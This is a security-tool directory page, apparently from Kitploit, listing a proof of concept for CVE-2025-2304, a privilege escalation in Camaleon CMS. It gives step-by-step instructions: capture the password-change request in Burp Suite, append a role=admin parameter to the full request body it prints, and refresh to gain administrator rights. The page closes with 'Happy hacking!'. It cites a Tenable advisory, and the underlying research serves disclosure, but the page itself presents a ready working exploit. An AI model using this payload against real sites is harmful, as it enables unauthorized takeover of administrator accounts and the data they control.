Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2025-2304_POC — CVE-2025-2304 POC - Camaleon CMS Privilege Escalation | Kitploit
Tools/GitHubGitHub/azureadtrent/cve-2025-2304_poc
Privilege EscalationVulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration Testing
GitHubazureadtrent/cve-2025-2304_poc

CVE-2025-2304_POC

CVE-2025-2304 POC - Camaleon CMS Privilege Escalation

View Repository
128 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2025-2304_POC

CVE-2025-2304 POC - Camaleon CMS Privilege Escalation

This POC is used to exploit Camaleon CMS privileges to administrator. The exploit works by injecting role into the password reset function of an authenticated user.


Prerequisites & Assumptions

  • You have a user account on the target Camaleon CMS that can access /admin.

1. Intercept

Start by logging into your user account. Once logged in, visit the profile page and click on change password. Capture the password change function using burp suite.


2. Change payload

Using the below as an example, edit your payload to add the role.

_method=patch&authenticity_token=gHl57BgeyzdyiC3AzDPgwY2Wn82rjrWNXG_1cCnZbPgg4tkN8_u2nWtqBusMawZOrXpkh0hHXDYhpojYXvVTvQ&password%5Bpassword%5D=test1234&password%5Bpassword_confirmation%5D=test1234&password%5Brole%5D=admin

by adding %5Brole%5D=admin to your payload, you should now be an administrator.


3. Refresh page

Refresh the page and you should now be an administrator.

Happy hacking!

Resources

https://www.tenable.com/security/research/tra-2025-09

Download Tool